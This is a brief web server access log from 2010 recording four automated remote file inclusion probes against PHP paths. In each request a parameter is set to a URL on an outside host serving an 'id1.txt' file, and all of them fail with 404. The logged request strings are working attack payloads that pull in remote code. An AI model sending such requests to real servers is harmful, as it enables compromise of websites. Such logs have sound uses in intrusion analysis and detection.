94.247.178.106 - - [16/Apr/2010:03:53:44 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:03:53:44 -0400] "GET /logs/access_log.Q110012600/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:53:52 -0400] "GET ///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:03:53:53 -0400] "GET /////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
